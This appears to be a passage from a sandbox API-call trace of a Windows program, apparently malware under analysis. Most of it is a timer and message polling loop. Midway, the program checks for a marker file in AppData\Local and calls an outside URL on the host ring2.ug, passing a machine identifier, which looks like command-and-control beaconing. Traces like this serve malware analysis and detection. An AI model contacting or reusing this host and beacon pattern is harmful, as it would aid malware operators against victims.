lpMsg=0x9a6a5c8) returned 0 [0215.587] Sleep (dwMilliseconds=0x64) [0215.694] timeGetTime () returned 0x113c8d4 [0215.694] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.694] Sleep (dwMilliseconds=0x64) [0215.803] timeGetTime () returned 0x113c942 [0215.803] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.803] Sleep (dwMilliseconds=0x64) [0215.912] timeGetTime () returned 0x113c9af [0215.912] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.912] Sleep (dwMilliseconds=0x64) [0216.021] timeGetTime () returned 0x113ca1c [0216.022] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.022] Sleep (dwMilliseconds=0x64) [0216.131] timeGetTime () returned 0x113ca89 [0216.131] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.131] Sleep (dwMilliseconds=0x64) [0216.240] timeGetTime () returned 0x113caf6 [0216.240] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.240] Sleep (dwMilliseconds=0x64) [0216.349] timeGetTime () returned 0x113cb64 [0216.349] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.349] Sleep (dwMilliseconds=0x64) [0216.458] timeGetTime () returned 0x113cbd1 [0216.458] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.458] Sleep (dwMilliseconds=0x64) [0216.567] timeGetTime () returned 0x113cc3e [0216.567] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.568] Sleep (dwMilliseconds=0x64) [0216.677] timeGetTime () returned 0x113ccab [0216.677] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.677] Sleep (dwMilliseconds=0x64) [0216.786] timeGetTime () returned 0x113cd18 [0216.786] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.786] Sleep (dwMilliseconds=0x64) [0216.895] timeGetTime () returned 0x113cd86 [0216.895] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0216.895] Sleep (dwMilliseconds=0x64) [0217.004] timeGetTime () returned 0x113cdf3 [0217.004] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.004] Sleep (dwMilliseconds=0x64) [0217.113] timeGetTime () returned 0x113ce60 [0217.113] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.113] Sleep (dwMilliseconds=0x64) [0217.223] timeGetTime () returned 0x113cecd [0217.223] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.223] Sleep (dwMilliseconds=0x64) [0217.332] timeGetTime () returned 0x113cf3a [0217.332] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.332] Sleep (dwMilliseconds=0x64) [0217.441] timeGetTime () returned 0x113cfa8 [0217.441] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.441] Sleep (dwMilliseconds=0x64) [0217.550] timeGetTime () returned 0x113d015 [0217.550] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.550] Sleep (dwMilliseconds=0x64) [0217.659] timeGetTime () returned 0x113d082 [0217.659] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.659] Sleep (dwMilliseconds=0x64) [0217.769] timeGetTime () returned 0x113d0ef [0217.769] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.769] Sleep (dwMilliseconds=0x64) [0217.878] timeGetTime () returned 0x113d15c [0217.878] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.878] Sleep (dwMilliseconds=0x64) [0217.987] timeGetTime () returned 0x113d1ca [0217.987] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0217.987] Sleep (dwMilliseconds=0x64) [0218.096] timeGetTime () returned 0x113d237 [0218.096] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0218.096] Sleep (dwMilliseconds=0x64) [0218.205] timeGetTime () returned 0x113d2a4 [0218.205] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0218.205] Sleep (dwMilliseconds=0x64) [0218.315] timeGetTime () returned 0x113d311 [0218.315] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0218.315] Sleep (dwMilliseconds=0x64) [0218.439] timeGetTime () returned 0x113d37e [0218.439] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9a6a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0218.439] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0218.439] AreFileApisANSI () returned 1 [0218.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0218.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x6794d8 [0218.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x6794d8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0218.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9a6a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0218.440] GetLastError () returned 0x2 [0218.440] GetLastError () returned 0x2 [0218.440] SetLastError (dwErrCode=0x2) [0218.440] GetLastError () returned 0x2 [0218.440] SetLastError (dwErrCode=0x2) [0218.440] GetLastError () returned 0x2 [0218.440] SetLastError (dwErrCode=0x2) [0218.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6794d8 | out: hHeap=0x620000) returned 1 [0218.440] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0218.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0218.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0218.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c41e0 | out: hHeap=0x620000) returned 1 [0218.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c16f0 [0218.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x340c3b8 [0218.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33c16f0, cbMultiByte=-1, lpWideCharStr=0x340c3b8, cchWideChar=1056 | out: lpWideCharStr="490C00C027B159BE46CE14D71389A685") returned 33 [0218.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x340d028 [0218.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340c3b8 | out: hHeap=0x620000) returned 1 [0218.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c16f0 | out: hHeap=0x620000) returned 1 [0218.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x692260 [0218.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0218.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d028 | out: hHeap=0x620000) returned 1 [0218.451] lstrcpyW (in: lpString1=0x9a6af78, lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" [0218.451] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0220.749] InternetReadFile (in: hFile=0x0, lpBuffer=0x9a6a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x9a6a604 | out: lpBuffer=0x9a6a778, lpdwNumberOfBytesRead=0x9a6a604) returned 0 [0220.749] InternetCloseHandle (hInternet=0x0) returned 0 [0220.749] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0220.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0220.749] timeGetTime () returned 0x113dc93 [0220.749] timeGetTime () returned 0x113dc93 [0220.749] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0220.749] Sleep (dwMilliseconds=0x64) [0220.857] timeGetTime () returned 0x113dd00 [0220.857] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0220.857] Sleep (dwMilliseconds=0x64) [0220.966] timeGetTime () returned 0x113dd6d [0220.967] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0220.967] Sleep (dwMilliseconds=0x64) [0221.076] timeGetTime () returned 0x113ddda [0221.076] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.076] Sleep (dwMilliseconds=0x64) [0221.185] timeGetTime () returned 0x113de48 [0221.185] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.185] Sleep (dwMilliseconds=0x64) [0221.294] timeGetTime () returned 0x113deb5 [0221.294] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.294] Sleep (dwMilliseconds=0x64) [0221.403] timeGetTime () returned 0x113df22 [0221.403] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.404] Sleep (dwMilliseconds=0x64) [0221.513] timeGetTime () returned 0x113df8f [0221.513] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.513] Sleep (dwMilliseconds=0x64) [0221.622] timeGetTime () returned 0x113dffc [0221.622] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.622] Sleep (dwMilliseconds=0x64) [0221.731] timeGetTime () returned 0x113e06a [0221.731] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.731] Sleep (dwMilliseconds=0x64) [0221.840] timeGetTime () returned 0x113e0d7 [0221.840] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.840] Sleep (dwMilliseconds=0x64) [0221.949] timeGetTime () returned 0x113e144 [0221.950] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0221.950] Sleep (dwMilliseconds=0x64) [0222.059] timeGetTime () returned 0x113e1b1 [0222.059] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.059] Sleep (dwMilliseconds=0x64) [0222.168] timeGetTime () returned 0x113e21e [0222.168] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.168] Sleep (dwMilliseconds=0x64) [0222.277] timeGetTime () returned 0x113e28c [0222.277] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.277] Sleep (dwMilliseconds=0x64) [0222.386] timeGetTime () returned 0x113e2f9 [0222.386] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.386] Sleep (dwMilliseconds=0x64) [0222.496] timeGetTime () returned 0x113e366 [0222.496] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.496] Sleep (dwMilliseconds=0x64) [0222.605] timeGetTime () returned 0x113e3d3 [0222.605] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.605] Sleep (dwMilliseconds=0x64) [0222.714] timeGetTime () returned 0x113e440 [0222.714] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.714] Sleep (dwMilliseconds=0x64) [0222.823] timeGetTime () returned 0x113e4ae [0222.823] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.823] Sleep (dwMilliseconds=0x64) [0222.932] timeGetTime () returned 0x113e51b [0222.933] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0222.933] Sleep (dwMilliseconds=0x64) [0223.041] timeGetTime () returned 0x113e588 [0223.042] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.042] Sleep (dwMilliseconds=0x64) [0223.151] timeGetTime () returned 0x113e5f5 [0223.151] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.151] Sleep (dwMilliseconds=0x64) [0223.260] timeGetTime () returned 0x113e662 [0223.260] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.260] Sleep (dwMilliseconds=0x64) [0223.372] timeGetTime () returned 0x113e6d0 [0223.372] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.372] Sleep (dwMilliseconds=0x64) [0223.478] timeGetTime () returned 0x113e73d [0223.478] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.478] Sleep (dwMilliseconds=0x64) [0223.587] timeGetTime () returned 0x113e7aa [0223.587] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.588] Sleep (dwMilliseconds=0x64) [0223.697] timeGetTime () returned 0x113e817 [0223.697] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.697] Sleep (dwMilliseconds=0x64) [0223.806] timeGetTime () returned 0x113e884 [0223.806] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.806] Sleep (dwMilliseconds=0x64) [0223.915] timeGetTime () returned 0x113e8f2 [0223.915] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0223.915] Sleep (dwMilliseconds=0x64) [0224.024] timeGetTime () returned 0x113e95f [0224.024] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.024] Sleep (dwMilliseconds=0x64) [0224.133] timeGetTime () returned 0x113e9cc [0224.133] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.133] Sleep (dwMilliseconds=0x64) [0224.243] timeGetTime () returned 0x113ea39 [0224.243] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.243] Sleep (dwMilliseconds=0x64) [0224.352] timeGetTime () returned 0x113eaa6 [0224.352] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.352] Sleep (dwMilliseconds=0x64) [0224.461] timeGetTime () returned 0x113eb14 [0224.461] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.461] Sleep (dwMilliseconds=0x64) [0224.570] timeGetTime () returned 0x113eb81 [0224.570] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.570] Sleep (dwMilliseconds=0x64) [0224.679] timeGetTime () returned 0x113ebee [0224.679] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.679] Sleep (dwMilliseconds=0x64) [0224.789] timeGetTime () returned 0x113ec5b [0224.789] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.789] Sleep (dwMilliseconds=0x64) [0224.898] timeGetTime () returned 0x113ecc8 [0224.898] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0224.898] Sleep (dwMilliseconds=0x64) [0225.007] timeGetTime () returned 0x113ed36 [0225.007] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.007] Sleep (dwMilliseconds=0x64) [0225.116] timeGetTime () returned 0x113eda3 [0225.116] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.116] Sleep (dwMilliseconds=0x64) [0225.225] timeGetTime () returned 0x113ee10 [0225.225] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.226] Sleep (dwMilliseconds=0x64) [0225.335] timeGetTime () returned 0x113ee7d [0225.335] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.335] Sleep (dwMilliseconds=0x64) [0225.444] timeGetTime () returned 0x113eeea [0225.444] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.444] Sleep (dwMilliseconds=0x64) [0225.553] timeGetTime () returned 0x113ef58 [0225.553] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.553] Sleep (dwMilliseconds=0x64) [0225.662] timeGetTime () returned 0x113efc5 [0225.662] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0225.662] Sleep (dwMilliseconds=0x64) [0225.771] timeGetTime () returned 0x113f032 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7638 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d1f80 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d21e8 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d2450 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d26b8 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d2920 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d2b88 [0225.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d2df0 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d3058 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d32c0 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d3528 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d3790 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d39f8 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d3c60 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d3ec8 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4130 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4398 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x67c738 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x33b4138 [0225.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c738 | out: hHeap=0x620000) returned 1 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x67eb28 [0225.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b4138 | out: hHeap=0x620000) returned 1 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x68b698 [0225.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67eb28 | out: hHeap=0x620000) returned 1 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d75f0 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4600 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4868 [0225.778] RtlAllocateHeap 